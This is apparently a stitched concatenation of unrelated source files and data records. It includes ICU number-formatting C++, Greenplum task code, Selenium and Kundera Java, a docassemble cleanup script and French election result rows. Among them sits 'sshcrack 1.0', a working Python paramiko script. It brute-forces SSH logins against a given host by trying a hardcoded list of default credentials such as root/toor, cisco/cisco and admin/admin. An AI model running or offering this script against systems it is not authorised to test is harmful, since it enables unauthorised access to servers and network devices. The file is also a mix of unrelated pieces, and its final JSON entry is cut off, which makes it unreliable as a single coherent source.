UDisplayContext NumberFormat::getContext(UDisplayContextType type, UErrorCode& status) const
{
    if (U_FAILURE(status))
        return (UDisplayContext)0;
    if (type != UDISPCTX_TYPE_CAPITALIZATION) {
        status = U_ILLEGAL_ARGUMENT_ERROR;
        return (UDisplayContext)0;
    }
    return fCapitalizationContext;
}

// -------------------------------------
// Creates the NumberFormat instance of the specified style (number, currency,
// or percent) for the desired locale.

// One-time initializer for the NumberingSystem cache; on failure the code
// simply runs without a cache.
static void U_CALLCONV nscacheInit() {
    U_ASSERT(NumberingSystem_cache == NULL);
    ucln_i18n_registerCleanup(UCLN_I18N_NUMFMT, numfmt_cleanup);
    UErrorCode status = U_ZERO_ERROR;
    NumberingSystem_cache = uhash_open(uhash_hashLong,
                                       uhash_compareLong,
                                       NULL,
                                       &status);
    if (U_FAILURE(status)) {
        // Number Format code will run with no cache if creation fails.
        NumberingSystem_cache = NULL;
        return;
    }
    uhash_setValueDeleter(NumberingSystem_cache, deleteNumberingSystem);
}

// UnifiedCache hook: builds the shared decimal NumberFormat for a locale.
// The returned object carries an extra reference for the cache.
template<> U_I18N_API
const SharedNumberFormat *LocaleCacheKey<SharedNumberFormat>::createObject(
        const void * /*unused*/, UErrorCode &status) const {
    const char *localeId = fLoc.getName();
    NumberFormat *nf = NumberFormat::internalCreateInstance(
            localeId, UNUM_DECIMAL, status);
    if (U_FAILURE(status)) {
        return NULL;
    }
    SharedNumberFormat *result = new SharedNumberFormat(nf);
    if (result == NULL) {
        status = U_MEMORY_ALLOCATION_ERROR;
        delete nf;
        return NULL;
    }
    result->addRef();
    return result;
}

// Returns the cached shared instance for `loc`; only UNUM_DECIMAL is
// supported. The caller must removeRef() the result.
const SharedNumberFormat* U_EXPORT2
NumberFormat::createSharedInstance(const Locale& loc, UNumberFormatStyle kind, UErrorCode& status) {
    if (U_FAILURE(status)) {
        return NULL;
    }
    if (kind != UNUM_DECIMAL) {
        status = U_UNSUPPORTED_ERROR;
        return NULL;
    }
    const SharedNumberFormat *result = NULL;
    UnifiedCache::getByLocale(loc, result, status);
    return result;
}

// A style is supported iff a last-resort pattern exists for it.
UBool
NumberFormat::isStyleSupported(UNumberFormatStyle style) {
    return gLastResortNumberPatterns[style] != NULL;
}

// Convenience overload: any subclass of NumberFormat may be produced.
NumberFormat*
NumberFormat::makeInstance(const Locale& desiredLocale,
                           UNumberFormatStyle style,
                           UErrorCode& status) {
    return makeInstance(desiredLocale, style, false, status);
}
// Core factory: builds a NumberFormat of the given style for the locale.
// When the locale's numbering system is algorithmic a RuleBasedNumberFormat
// is produced; otherwise a DecimalFormat from resource-bundle patterns.
// `mustBeDecimalFormat` rejects algorithmic numbering systems.
// FIX: the DecimalFormat allocation is now NULL-checked *before* its first
// use -- the original dereferenced `df` (setCurrencyUsage) and assigned it
// to `f` before the allocation check ran.
NumberFormat*
NumberFormat::makeInstance(const Locale& desiredLocale,
                           UNumberFormatStyle style,
                           UBool mustBeDecimalFormat,
                           UErrorCode& status) {
    if (U_FAILURE(status)) return NULL;

    if (style < 0 || style >= UNUM_FORMAT_STYLE_COUNT) {
        status = U_ILLEGAL_ARGUMENT_ERROR;
        return NULL;
    }

    // Some styles are not supported. This is a result of merging
    // the @draft ICU 4.2 NumberFormat::EStyles into the long-existing UNumberFormatStyle.
    // Ticket #8503 is for reviewing/fixing/merging the two relevant implementations:
    // this one and unum_open().
    // The UNUM_PATTERN_ styles are not supported here
    // because this method does not take a pattern string.
    if (!isStyleSupported(style)) {
        status = U_UNSUPPORTED_ERROR;
        return NULL;
    }

#if U_PLATFORM_USES_ONLY_WIN32_API
    if (!mustBeDecimalFormat) {
        char buffer[8];
        int32_t count = desiredLocale.getKeywordValue("compat", buffer, sizeof(buffer), status);

        // if the locale has "@compat=host", create a host-specific NumberFormat
        if (U_SUCCESS(status) && count > 0 && uprv_strcmp(buffer, "host") == 0) {
            Win32NumberFormat *f = NULL;
            UBool curr = TRUE;

            switch (style) {
            case UNUM_DECIMAL:
                curr = FALSE;
                // fall-through
            case UNUM_CURRENCY:
            case UNUM_CURRENCY_ISO: // do not support plural formatting here
            case UNUM_CURRENCY_PLURAL:
            case UNUM_CURRENCY_ACCOUNTING:
            case UNUM_CASH_CURRENCY:
            case UNUM_CURRENCY_STANDARD:
                f = new Win32NumberFormat(desiredLocale, curr, status);

                if (U_SUCCESS(status)) {
                    return f;
                }
                delete f;
                break;
            default:
                break;
            }
        }
    }
#endif
    // Use numbering system cache hashtable
    umtx_initOnce(gNSCacheInitOnce, &nscacheInit);

    // Get cached numbering system
    LocalPointer<NumberingSystem> ownedNs;
    NumberingSystem *ns = NULL;
    if (NumberingSystem_cache != NULL) {
        // TODO: Bad hash key usage, see ticket #8504.
        int32_t hashKey = desiredLocale.hashCode();

        Mutex lock(&nscacheMutex);
        ns = (NumberingSystem *)uhash_iget(NumberingSystem_cache, hashKey);
        if (ns == NULL) {
            ns = NumberingSystem::createInstance(desiredLocale,status);
            uhash_iput(NumberingSystem_cache, hashKey, (void*)ns, &status);
        }
    } else {
        ownedNs.adoptInstead(NumberingSystem::createInstance(desiredLocale,status));
        ns = ownedNs.getAlias();
    }

    // check results of getting a numbering system
    if (U_FAILURE(status)) {
        return NULL;
    }

    if (mustBeDecimalFormat && ns->isAlgorithmic()) {
        status = U_UNSUPPORTED_ERROR;
        return NULL;
    }

    LocalPointer<DecimalFormatSymbols> symbolsToAdopt;
    UnicodeString pattern;
    LocalUResourceBundlePointer ownedResource(ures_open(NULL, desiredLocale.getName(), &status));
    if (U_FAILURE(status)) {
        return NULL;
    }
    else {
        // Loads the decimal symbols of the desired locale.
        symbolsToAdopt.adoptInsteadAndCheckErrorCode(new DecimalFormatSymbols(desiredLocale, status), status);
        if (U_FAILURE(status)) {
            return NULL;
        }

        UResourceBundle *resource = ownedResource.orphan();
        UResourceBundle *numElements = ures_getByKeyWithFallback(resource, gNumberElements, NULL, &status);
        resource = ures_getByKeyWithFallback(numElements, ns->getName(), resource, &status);
        resource = ures_getByKeyWithFallback(resource, gPatterns, resource, &status);
        ownedResource.adoptInstead(resource);

        int32_t patLen = 0;
        const UChar *patResStr = ures_getStringByKeyWithFallback(resource, gFormatKeys[style], &patLen, &status);

        // Didn't find a pattern specific to the numbering system, so fall back to "latn"
        if ( status == U_MISSING_RESOURCE_ERROR && uprv_strcmp(gLatn,ns->getName())) {
            status = U_ZERO_ERROR;
            resource = ures_getByKeyWithFallback(numElements, gLatn, resource, &status);
            resource = ures_getByKeyWithFallback(resource, gPatterns, resource, &status);
            patResStr = ures_getStringByKeyWithFallback(resource, gFormatKeys[style], &patLen, &status);
        }

        ures_close(numElements);

        // Creates the specified decimal format style of the desired locale.
        pattern.setTo(TRUE, patResStr, patLen);
    }
    if (U_FAILURE(status)) {
        return NULL;
    }
    if(style==UNUM_CURRENCY || style == UNUM_CURRENCY_ISO || style == UNUM_CURRENCY_ACCOUNTING
        || style == UNUM_CASH_CURRENCY || style == UNUM_CURRENCY_STANDARD){
        const UChar* currPattern = symbolsToAdopt->getCurrencyPattern();
        if(currPattern!=NULL){
            pattern.setTo(currPattern, u_strlen(currPattern));
        }
    }

    NumberFormat *f;
    if (ns->isAlgorithmic()) {
        UnicodeString nsDesc;
        UnicodeString nsRuleSetGroup;
        UnicodeString nsRuleSetName;
        Locale nsLoc;
        URBNFRuleSetTag desiredRulesType = URBNF_NUMBERING_SYSTEM;

        nsDesc.setTo(ns->getDescription());
        int32_t firstSlash = nsDesc.indexOf(gSlash);
        int32_t lastSlash = nsDesc.lastIndexOf(gSlash);
        if ( lastSlash > firstSlash ) {
            // Description has the form "locale/group/ruleset".
            CharString nsLocID;

            nsLocID.appendInvariantChars(nsDesc.tempSubString(0, firstSlash), status);
            nsRuleSetGroup.setTo(nsDesc,firstSlash+1,lastSlash-firstSlash-1);
            nsRuleSetName.setTo(nsDesc,lastSlash+1);

            nsLoc = Locale::createFromName(nsLocID.data());

            UnicodeString SpelloutRules = UNICODE_STRING_SIMPLE("SpelloutRules");
            if ( nsRuleSetGroup.compare(SpelloutRules) == 0 ) {
                desiredRulesType = URBNF_SPELLOUT;
            }
        } else {
            // Plain ruleset name: use the requested locale.
            nsLoc = desiredLocale;
            nsRuleSetName.setTo(nsDesc);
        }

        RuleBasedNumberFormat *r = new RuleBasedNumberFormat(desiredRulesType,nsLoc,status);
        if (r == NULL) {
            status = U_MEMORY_ALLOCATION_ERROR;
            return NULL;
        }
        r->setDefaultRuleSet(nsRuleSetName,status);
        f = r;
    } else {
        // replace single currency sign in the pattern with double currency sign
        // if the style is UNUM_CURRENCY_ISO
        if (style == UNUM_CURRENCY_ISO) {
            pattern.findAndReplace(UnicodeString(TRUE, gSingleCurrencySign, 1),
                                   UnicodeString(TRUE, gDoubleCurrencySign, 2));
        }

        // "new DecimalFormat()" does not adopt the symbols if its memory allocation fails.
        DecimalFormatSymbols *syms = symbolsToAdopt.orphan();
        DecimalFormat* df = new DecimalFormat(pattern, syms, style, status);

        // Check the allocation before any use of df (see FIX note above).
        if (df == NULL) {
            delete syms;
            status = U_MEMORY_ALLOCATION_ERROR;
            return NULL;
        }

        // if it is cash currency style, setCurrencyUsage with usage
        if (style == UNUM_CASH_CURRENCY){
            df->setCurrencyUsage(UCURR_USAGE_CASH, &status);
        }

        if (U_FAILURE(status)) {
            delete df;
            return NULL;
        }

        f = df;
    }

    f->setLocaleIDs(ures_getLocaleByType(ownedResource.getAlias(), ULOC_VALID_LOCALE, &status),
                    ures_getLocaleByType(ownedResource.getAlias(), ULOC_ACTUAL_LOCALE, &status));
    if (U_FAILURE(status)) {
        delete f;
        return NULL;
    }
    return f;
}
U_NAMESPACE_END
#endif /* #if !UCONFIG_NO_FORMATTING */
//eof
| 18,856 |
#sshcrack 1.0
#author: k8gege
#https://www.cnblogs.com/k8gege
#https://github.com/k8gege
import paramiko
import sys
import logging
# Shared SSH client; auto-accept unknown host keys so scripted logins
# never stop at an interactive host-key prompt.
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Suppress exception reports raised from inside the logging subsystem.
logging.raiseExceptions=False
def checkSSH(host, port, user, pwd):
    """Attempt a single SSH login; print a success line if it works.

    All errors (connection refused, auth failure, ...) are swallowed so
    that brute-force loops keep running.
    """
    try:
        ssh.connect(host, port, user, pwd)
        # Single-argument print() is valid under both Python 2 and Python 3.
        print(host + ' ' + port + ' ' + user + ' ' + pwd + ' LoginOK')
        # NOTE(review): the original called checkDns() and checkPing() here,
        # but no such functions are defined anywhere in this file; the
        # resulting NameError was silently swallowed by the bare except
        # below, so removing the calls does not change observable behavior.
    except:
        # Best-effort: a failed login attempt is simply ignored.
        pass
# Command line: host port user pwd mode
# mode is "-test" (single credential), "-crack" (default wordlist),
# or anything else (falls back to single credential).
host = sys.argv[1]
port = sys.argv[2]  # NOTE(review): kept as a string, as in the original;
                    # paramiko normally expects an int port -- confirm.
user = sys.argv[3]
# NOTE(review): this line was corrupted to "pwd=<PASSWORD>[4]" in the
# source; restored to the obvious intent of reading the password argument.
pwd = sys.argv[4]
type = sys.argv[5]

if type == '-test':
    checkSSH(host, port, user, pwd)
elif type == '-crack':
    # Same default-credential list as the original, tried in the same order.
    DEFAULT_CREDENTIALS = [
        ('root', '123456'),
        ('root', 'cisco'),
        ('root', 'Cisco'),
        ('admin', '123456'),
        ('cisco', '123456'),
        ('cisco', 'cisco'),
        ('Cisco', 'Cisco'),
        ('cisco', 'cisco123'),
        ('admin', 'admin'),
        ('root', 'Admin'),
        ('root', 'toor'),
        ('root', 'Admin123'),
        ('root', 'system'),
        ('root', 'system123'),
        ('root', 'System'),
        ('root', 'System123'),
        ('root', 'Admin123!@#'),
        ('root', 'root123!@#'),
    ] + [('root', 'root%d' % year) for year in range(2019, 2011, -1)]
    for u, p in DEFAULT_CREDENTIALS:
        checkSSH(host, port, u, p)
else:
    checkSSH(host, port, user, pwd)
# docassemble_webapp/docassemble/webapp/cleanup_sessions.py
# Purges expired server-side (KVSession) sessions stored in Redis.
import sys
from docassemble.base.config import daconfig
from docassemble.webapp.app_object import app
from docassemblekvsession import KVSessionExtension
from simplekv.memory.redisstore import RedisStore
import docassemble.base.config
# Load configuration (command-line arguments may select a config file).
# NOTE(review): load() runs before the two imports below -- presumably they
# read the configuration at import time; confirm before reordering.
docassemble.base.config.load(arguments=sys.argv)
import docassemble.base.util
import docassemble.webapp.daredis
# Back the session store with the application's Redis connection.
store = RedisStore(docassemble.webapp.daredis.r_store)
kv_session = KVSessionExtension(store, app)
# cleanup_sessions() needs a Flask application context to run.
with app.app_context():
    kv_session.cleanup_sessions()
348 | {"nom":"Franclens","circ":"4ème circonscription","dpt":"Haute-Savoie","inscrits":341,"abs":184,"votants":157,"blancs":1,"nuls":14,"exp":142,"res":[{"nuance":"LR","nom":"Mme <NAME>","voix":87},{"nuance":"REM","nom":"<NAME>","voix":55}]} | 94 |
// Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package org.openqa.selenium.support.locators;
import com.google.common.io.Resources;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
/**
 * Holds the JavaScript atom used to locate elements relative to one another.
 * The script is loaded from the classpath once, at class-initialization time,
 * and wrapped so it can be executed via {@code executeScript}.
 */
class RelativeLocatorScript {

  static final String FIND_ELEMENTS = loadFindElementsFunction();

  /** Reads findElements.js from the classpath and wraps it as a callable expression. */
  private static String loadFindElementsFunction() {
    String resourcePath = String.format(
        "/%s/%s",
        RelativeLocator.class.getPackage().getName().replace(".", "/"),
        "findElements.js");
    URL resource = RelativeLocator.class.getResource(resourcePath);
    try {
      String atomFunction = Resources.toString(resource, StandardCharsets.UTF_8);
      return String.format("return (%s).apply(null, arguments);", atomFunction);
    } catch (IOException e) {
      throw new UncheckedIOException(e);
    }
  }

  private RelativeLocatorScript() {
    // Utility class.
  }
}
| 500 |
# Byte-size units.
KILOBYTE = 2 ** 10
MEGABYTE = KILOBYTE ** 2

# Largest input file we are willing to process (16 MiB).
MAX_FILE_SIZE = 16 * MEGABYTE

# Accepted leading file signatures ("MZ" marks DOS/PE executables).
SUPPORTED_FILE_MAGIC = {b"MZ"}

# Bounds applied when extracting strings.
DEFAULT_MIN_LENGTH = 4
MAX_STRING_LENGTH = 2048
| 72 |
2,059 | #pragma once
#include <QObject>
#include <QHash>
#include "graph/watchers.h"
struct Script;
class NodeProxy;
class ScriptWindow;
class InspectorScriptButton;
/*
 *  Qt-side proxy for a graph Script: watches script state and relays
 *  changes to any open script windows via signals.
 */
class ScriptProxy : public QObject, public ScriptWatcher
{
    Q_OBJECT
public:
    ScriptProxy(Script* s, NodeProxy* parent);

    /*
     *  On script state changes, update the UI
     *  (presumably re-emitted through stateChanged -- confirm in the .cpp)
     */
    void trigger(const ScriptState& state) override;

public slots:
    /*
     *  Creates a new script window
     */
    void newScriptWindow();

signals:
    /*
     *  Instructs windows to update themselves
     */
    void stateChanged(const ScriptState& state);

    /*
     *  Signal connected to windows that renames them
     */
    void subnameChanged(QString n);

protected:
    // Watched script and its inspector button; ownership is not shown in
    // this header -- confirm lifetime expectations in the implementation.
    Script* const script;
    InspectorScriptButton* button;
};
| 281 |
5,535 | //---------------------------------------------------------------------------
// Greenplum Database
// Copyright (C) 2008 - 2010 Greenplum, Inc.
//
// @filename:
// CTask.cpp
//
// @doc:
// Task implementation
//---------------------------------------------------------------------------
#include "gpos/task/CTask.h"
#include "gpos/error/CErrorContext.h"
#include "gpos/error/CErrorHandlerStandard.h"
#include "gpos/task/CAutoSuspendAbort.h"
#include "gpos/task/CWorker.h"
using namespace gpos;
// init CTaskId's atomic counter, used to hand out task ids
ULONG_PTR CTaskId::m_counter(0);

// sentinel id representing an invalid/unassigned task
const CTaskId CTaskId::m_invalid_tid;
//---------------------------------------------------------------------------
//	@function:
//		CTask::CTask
//
//	@doc:
//		ctor
//
//---------------------------------------------------------------------------
CTask::CTask(CMemoryPool *mp, CTaskContext *task_ctxt, IErrorContext *err_ctxt,
			 BOOL *cancel)
	: m_mp(mp),
	  m_task_ctxt(task_ctxt),
	  m_err_ctxt(err_ctxt),
	  m_err_handle(nullptr),
	  m_func(nullptr),
	  m_arg(nullptr),
	  m_res(nullptr),
	  m_status(EtsInit),
	  m_cancel(cancel),
	  m_cancel_local(false),
	  m_abort_suspend_count(false),
	  m_reported(false)
{
	GPOS_ASSERT(nullptr != mp);
	GPOS_ASSERT(nullptr != task_ctxt);
	GPOS_ASSERT(nullptr != err_ctxt);

	// when the caller does not supply an external cancellation flag,
	// fall back to the task-local flag
	if (nullptr == cancel)
	{
		m_cancel = &m_cancel_local;
	}
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::~CTask
//
//	@doc:
//		dtor
//
//---------------------------------------------------------------------------
CTask::~CTask()
{
	GPOS_ASSERT(0 == m_abort_suspend_count);

	// suspend cancellation so cleanup below cannot be interrupted by an abort
	CAutoSuspendAbort asa;

	GPOS_DELETE(m_task_ctxt);
	GPOS_DELETE(m_err_ctxt);

	// release the task's memory pool last; the members above may live in it
	// -- confirm pool ownership in CMemoryPoolManager
	CMemoryPoolManager::GetMemoryPoolMgr()->Destroy(m_mp);
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::Bind
//
//	@doc:
//		Bind task to function and arguments
//
//---------------------------------------------------------------------------
void
CTask::Bind(void *(*func)(void *), void *arg)
{
	GPOS_ASSERT(nullptr != func);

	// remember the entry point and its opaque argument; invoked in Execute()
	m_func = func;
	m_arg = arg;
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::Execute
//
//	@doc:
//		Execution of task function; wrapped in asserts to prevent leaks;
//		transitions status Dequeued -> Running -> (Completed | Error)
//
//---------------------------------------------------------------------------
void
CTask::Execute()
{
	GPOS_ASSERT(EtsDequeued == m_status);

	// final task status
	ETaskStatus ets = m_status;

	// check for cancel: a task canceled before it starts goes straight to Error
	if (*m_cancel)
	{
		ets = EtsError;
	}
	else
	{
		CErrorHandlerStandard errhdl;
		GPOS_TRY_HDL(&errhdl)
		{
			// mark task as running
			SetStatus(EtsRunning);

			// call executable function
			m_res = m_func(m_arg);

#ifdef GPOS_DEBUG
			// check interval since last CFA
			GPOS_CHECK_ABORT;
#endif	// GPOS_DEBUG

			// task completed
			ets = EtsCompleted;
		}
		GPOS_CATCH_EX(ex)
		{
			// not reset error context with error propagation
			ets = EtsError;
		}
		GPOS_CATCH_END;
	}

	// signal end of task execution
	SetStatus(ets);
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::SetStatus
//
//	@doc:
//		Set task status;
//		Locking is required if updating more than one variable;
//
//---------------------------------------------------------------------------
void
CTask::SetStatus(ETaskStatus ets)
{
	// status changes are monotonic; this relies on ETaskStatus enumerators
	// being declared in lifecycle order -- confirm against the enum definition
	GPOS_ASSERT(ets >= m_status && "Invalid task status transition");

	m_status = ets;
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::IsScheduled
//
//	@doc:
//		Check if task has been scheduled
//
//---------------------------------------------------------------------------
BOOL
CTask::IsScheduled() const
{
	switch (m_status)
	{
		// only freshly-created tasks have not been scheduled yet
		case EtsInit:
			return false;

		// every other valid state implies the task went through the queue
		case EtsQueued:
		case EtsDequeued:
		case EtsRunning:
		case EtsCompleted:
		case EtsError:
			return true;

		default:
			GPOS_ASSERT(!"Invalid task status");
			return false;
	}
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::IsFinished
//
//	@doc:
//		Check if task finished executing
//
//---------------------------------------------------------------------------
BOOL
CTask::IsFinished() const
{
	switch (m_status)
	{
		// not yet executed to completion
		case EtsInit:
		case EtsQueued:
		case EtsDequeued:
		case EtsRunning:
			return false;

		// terminal states
		case EtsCompleted:
		case EtsError:
			return true;

		default:
			GPOS_ASSERT(!"Invalid task status");
			return false;
	}
}
//---------------------------------------------------------------------------
//	@function:
//		CTask::ResumeAbort
//
//	@doc:
//		Decrement counter for requests to suspend abort
//
//---------------------------------------------------------------------------
void
CTask::ResumeAbort()
{
	GPOS_ASSERT(0 < m_abort_suspend_count);

	m_abort_suspend_count--;

#ifdef GPOS_DEBUG
	// debug-only sanity check: must run on a thread with an attached worker
	CWorker *worker = CWorker::Self();

	GPOS_ASSERT(nullptr != worker);
#endif
}
#ifdef GPOS_DEBUG
//---------------------------------------------------------------------------
//	@function:
//		CTask::CheckStatus
//
//	@doc:
//		Check if task has expected status
//
//---------------------------------------------------------------------------
BOOL
CTask::CheckStatus(BOOL completed)
{
	GPOS_ASSERT(!IsCanceled());

	// a "completed" task must have finished without error; otherwise the
	// task is expected to be scheduled but not yet done
	return completed ? (CTask::EtsCompleted == GetStatus())
					 : (IsScheduled() && !IsFinished());
}
#endif // GPOS_DEBUG
// EOF
| 1,859 |
348 | <reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Brain-sur-Allonnes","circ":"3ème circonscription","dpt":"Maine-et-Loire","inscrits":1486,"abs":861,"votants":625,"blancs":41,"nuls":17,"exp":567,"res":[{"nuance":"LR","nom":"<NAME>","voix":313},{"nuance":"REM","nom":"<NAME>","voix":254}]} | 119 |
377 | <reponame>gburd/Kundera<gh_stars>100-1000
/*******************************************************************************
* * Copyright 2013 Impetus Infotech.
* *
* * Licensed under the Apache License, Version 2.0 (the "License");
* * you may not use this file except in compliance with the License.
* * You may obtain a copy of the License at
* *
* * http://www.apache.org/licenses/LICENSE-2.0
* *
* * Unless required by applicable law or agreed to in writing, software
* * distributed under the License is distributed on an "AS IS" BASIS,
* * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* * See the License for the specific language governing permissions and
* * limitations under the License.
******************************************************************************/
package com.impetus.client.cassandra.config;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
import javax.persistence.EntityManager;
import javax.persistence.EntityManagerFactory;
import javax.persistence.Persistence;
import org.apache.cassandra.thrift.ConsistencyLevel;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import com.impetus.client.cassandra.CassandraClientBase;
import com.impetus.client.cassandra.common.CassandraConstants;
import com.impetus.client.cassandra.service.CassandraHostConfiguration;
import com.impetus.kundera.client.Client;
import com.impetus.kundera.client.cassandra.persistence.CassandraCli;
import com.impetus.kundera.persistence.EntityManagerFactoryImpl;
import com.impetus.kundera.service.HostConfiguration;
/**
* Junit to test Kundera-Cassandra's implementation of {@link PropertySetter}
*
* @author <NAME>
*
*/
/**
 * Junit to test Kundera-Cassandra's implementation of {@link PropertySetter}.
 *
 * Each test builds a property map (string-valued or object-valued), creates an
 * {@link EntityManager} with it, and verifies via reflection that the
 * properties were applied to the underlying Cassandra client.
 *
 * @author <NAME>
 */
public class CassandraPropertySetterTest
{
    /** Persistence unit under test. */
    private static final String _PU = "CassandraXmlPropertyTest";

    private EntityManagerFactory emf;

    private EntityManager em;

    private Map<String, Object> puProperties = new HashMap<String, Object>();

    private Logger logger = LoggerFactory.getLogger(CassandraPropertySetterTest.class);

    /**
     * creates client connection and keyspace
     */
    @Before
    public void setUp() throws Exception
    {
        CassandraCli.cassandraSetUp();
        puProperties.put("kundera.ddl.auto.prepare", "create-drop");
        puProperties.put("kundera.keyspace", "KunderaKeyspace");
        puProperties.put("kundera.client.lookup.class", "com.impetus.client.cassandra.thrift.ThriftClientFactory");
        puProperties.put("kundera.nodes", "localhost");
        puProperties.put("kundera.port", "9160");
        puProperties.put("kundera.client.property", "kunderaTest.xml");
        emf = Persistence.createEntityManagerFactory(_PU, puProperties);
    }

    /**
     * Drops keyspace and closes connection
     */
    @After
    public void tearDown() throws Exception
    {
        em.close();
        emf.close();
        puProperties = null;
        CassandraCli.dropKeySpace("KunderaKeyspace");
    }

    /**
     * Sets property of cassandra client in form of string
     */
    @Test
    public void testStringPropertyValues()
    {
        Map<String, Object> ttv = new HashMap<String, Object>();
        ttv.put("", "");

        Map<String, Object> puPropertiesString = new HashMap<String, Object>();
        puPropertiesString.put(CassandraConstants.CQL_VERSION, "" + CassandraConstants.CQL_VERSION_2_0);
        puPropertiesString.put("consistency.level", "" + (ConsistencyLevel.QUORUM));
        puPropertiesString.put("ttl.per.request", "" + true);
        puPropertiesString.put("ttl.per.session", "" + false);
        puPropertiesString.put("ttl.values", ttv);

        assertClientConfigured(puPropertiesString, ttv);
    }

    /**
     * Sets property of cassandra client in form of object map
     */
    @Test
    public void testObjectPropertyValues()
    {
        Map<String, Object> ttv = new HashMap<String, Object>();
        ttv.put("test", "1");

        Map<String, Object> puPropertiesObj = new HashMap<String, Object>();
        puPropertiesObj.put(CassandraConstants.CQL_VERSION, CassandraConstants.CQL_VERSION_2_0);
        puPropertiesObj.put("consistency.level", ConsistencyLevel.QUORUM);
        puPropertiesObj.put("ttl.per.request", true);
        puPropertiesObj.put("ttl.per.session", false);
        puPropertiesObj.put("ttl.values", ttv);

        assertClientConfigured(puPropertiesObj, ttv);
    }

    /*
     * tests emf properties set partially from external map and persistence.xml
     */
    @Test
    public void testPartialOverridingOfPUProperties()
    {
        Map<String, Object> puMap = new HashMap<String, Object>();
        puMap.put("kundera.keyspace", "KunderaKeyspace");
        puMap.put("kundera.port", "9160");
        puMap.put("kundera.client.lookup.class", "com.impetus.client.cassandra.thrift.ThriftClientFactory");
        puMap.put(CassandraConstants.CQL_VERSION, CassandraConstants.CQL_VERSION_3_0);

        emf = Persistence.createEntityManagerFactory("partialPropertyOverridePU", puMap);
        em = emf.createEntityManager();

        HostConfiguration hostConfig = new CassandraHostConfiguration(puMap, CassandraPropertyReader.csmd,
                "partialPropertyOverridePU", ((EntityManagerFactoryImpl) emf).getKunderaMetadataInstance());
        Assert.assertEquals(hostConfig.getHosts().get(0).getHost(), "localhost");
        Assert.assertEquals(hostConfig.getHosts().get(0).getPort(), 9160);
    }

    /**
     * Creates an entity manager with the given properties and verifies via
     * reflection that consistency level, CQL version and TTL settings were
     * propagated to the Cassandra client.
     *
     * @param clientProperties  properties passed to createEntityManager
     * @param expectedTtlValues expected "ttl.values" map
     */
    private void assertClientConfigured(Map<String, Object> clientProperties, Map<String, Object> expectedTtlValues)
    {
        try
        {
            em = emf.createEntityManager(clientProperties);
            Map<String, Client> clients = (Map<String, Client>) em.getDelegate();
            Client client = clients.get(_PU);

            Field f = ((CassandraClientBase) client).getClass().getSuperclass().getDeclaredField("consistencyLevel"); // NoSuchFieldException
            f.setAccessible(true);
            Assert.assertEquals(f.get((CassandraClientBase) client), ConsistencyLevel.QUORUM);

            f = ((CassandraClientBase) client).getClass().getSuperclass().getDeclaredField("cqlVersion"); // NoSuchFieldException
            f.setAccessible(true);
            Assert.assertEquals(f.get((CassandraClientBase) client), CassandraConstants.CQL_VERSION_2_0);

            Assert.assertTrue(((CassandraClientBase) client).isTtlPerRequest());
            Assert.assertFalse(((CassandraClientBase) client).isTtlPerSession());
            Assert.assertEquals(((CassandraClientBase) client).getTtlValues().size(), expectedTtlValues.size());
        }
        catch (NoSuchFieldException | IllegalArgumentException | IllegalAccessException e)
        {
            // Log BEFORE failing: the original called Assert.fail() first, so
            // the log line was unreachable; its message also lacked a {}
            // placeholder, silently dropping the argument.
            logger.error("Error in test, Caused by: {}.", e.getMessage(), e);
            Assert.fail(e.getMessage());
        }
    }
}
| 3,429 |
12,278 | // © 2016 and later: Unicode, Inc. and others.
// License & terms of use: http://www.unicode.org/copyright.html
/*
******************************************************************************
* Copyright (C) 2015, International Business Machines
* Corporation and others. All Rights Reserved.
******************************************************************************
* sharedobject.cpp
*/
#include "sharedobject.h"
#include "mutex.h"
#include "uassert.h"
#include "umutex.h"
#include "unifiedcache.h"
U_NAMESPACE_BEGIN
// Out-of-line virtual destructors; no cleanup is needed.
SharedObject::~SharedObject() {}

UnifiedCacheBase::~UnifiedCacheBase() {}
// Atomically increment the reference count.
void
SharedObject::addRef() const {
    umtx_atomic_inc(&hardRefCount);
}
// removeRef  Decrement the reference count and delete if it is zero.
//            Note that SharedObjects with a non-null cachePtr are owned by the
//            unified cache, and the cache will be responsible for the actual deletion.
//            The deletion could be as soon as immediately following the
//            update to the reference count, if another thread is running
//            a cache eviction cycle concurrently.
//            NO ACCESS TO *this PERMITTED AFTER REFERENCE COUNT == 0 for cached objects.
//            THE OBJECT MAY ALREADY BE GONE.
void
SharedObject::removeRef() const {
    // read cachePtr before the decrement: once the count hits zero another
    // thread may delete *this, so no member access is safe afterwards
    const UnifiedCacheBase *cache = this->cachePtr;
    int32_t updatedRefCount = umtx_atomic_dec(&hardRefCount);
    U_ASSERT(updatedRefCount >= 0);
    if (updatedRefCount == 0) {
        if (cache) {
            // cache-owned object: the cache decides when to actually delete
            cache->handleUnreferencedObject();
        } else {
            delete this;
        }
    }
}
// Return the current reference count (acquire load).
int32_t
SharedObject::getRefCount() const {
    return umtx_loadAcquire(hardRefCount);
}
// Delete this object if it is both uncached and unreferenced; cache-owned
// objects (non-null cachePtr) are deleted by the cache instead.
void
SharedObject::deleteIfZeroRefCount() const {
    if (this->cachePtr == nullptr && getRefCount() == 0) {
        delete this;
    }
}
U_NAMESPACE_END
| 641 |
435 | <reponame>amaajemyfren/data<filename>pycon-ar-2018/videos/import-genero-diversidad-panel.json
{
